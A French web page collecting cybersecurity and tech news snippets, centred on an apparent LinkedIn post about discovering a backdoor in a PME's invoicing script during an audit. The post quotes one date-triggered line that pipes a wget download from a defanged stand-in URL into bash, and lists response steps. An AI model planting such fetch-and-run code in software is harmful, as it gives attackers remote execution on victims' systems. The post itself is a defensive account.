Guides ANSSI | MesServicesCyber

C’est fait : il faudra bientôt passer une visite médicale pour garder votre permis de conduire

Un formulaire d'auto-évaluation sera aussi possible.

Wimi face à Microsoft et Google, la suite collaborative française obtient la qualification SecNumCloud de l'ANSSI

La plateforme collaborative française Wimi a obtenu la qualification SecNumCloud 3.2 de l'ANSSI. Une rareté dans le SaaS français, qui positionne l'entreprise comme une alternative souveraine sérieuse aux géants du cloud américains.

#cybersécurité #backdoor #tech #anssi #cnil | Gabriel.. C.

🕵️‍♂️ CyberSécurité : le jour où j’ai découvert une backdoor dans un logiciel client (et comment réagir) **Contexte** : Lors d’un audit de routine pour un client (une PME industrielle), j’ai repéré un *code suspect* dans leur logiciel de gestion interne. --- 🔹 **La découverte** : En analysant un script censé gérer les *factures clients*, j’ai repéré cette ligne étrange : *"if datetime.now() == datetime(2023, 12, 25): os.system("wget hxxps://exemple[.]com/fichier_suspect.sh | bash")"* → Un *cheval de Troie* programmé pour s’activer *le 25 décembre* (quand personne ne travaille). --- 🔹 **Notre réaction immédiate** : 1. *Isolement du système* : Déconnexion immédiate du serveur du réseau. 2. *Recherche de l’origine* : Le code malveillant avait été *injecté via une mise à jour piratée* du logiciel. 3. *Correction et sécurisation* : - Suppression du code malveillant. - Changement de *tous les mots de passe*. - Mise en place d’un *système de détection d’intrusion*. 4. *Signalement aux autorités* : Dépôt de plainte auprès de la *CNIL* et de l’*ANSSI*. --- 💡 **Leçons tirées** : - *Auditez régulièrement votre code* : Même les logiciels "fiables" peuvent être compromis. - *Limitez les permissions* : Un logiciel de facturation n’a *pas besoin* d’exécuter des commandes système. - *Sauvegardes = votre meilleure assurance* : Sans elles, ce client aurait perdu *3 ans de données*. --- 💬 Avez-vous déjà découvert une faille de sécurité inattendue ? #CyberSécurité #Backdoor #Tech #ANSSI #CNIL

French Cybersecurity Agency

Les actualités Aucun article trouvé. Voir tous les articles La directive NIS 2 Alors que la menace cyber augmente et […]

Actualités informatiques et numériques au quotidien

Actualités informatiques et numériques au quotidien. Articles de fond, nouvelles du quotidien, dossiers, dessins, débats, venez vous affûter sur Next

« Nous ne pouvons pas tout contrôler » : l’ANSSI face à la complexité des systèmes de l’État

Face aux quasi-incessantes fuites de données en France, notamment sur des institutions, l’ANSSI serait sur la sellette ? Son directeur général Vincent…

Piratage de l'ANTS : les failles étaient connues et ont été ignorées pendant des mois

GNT est le portail Hi-Tech français consacré aux nouvelles technologies (internet, logiciel, matériel, mobilité, entreprise) et au jeu vidéo PC et consoles.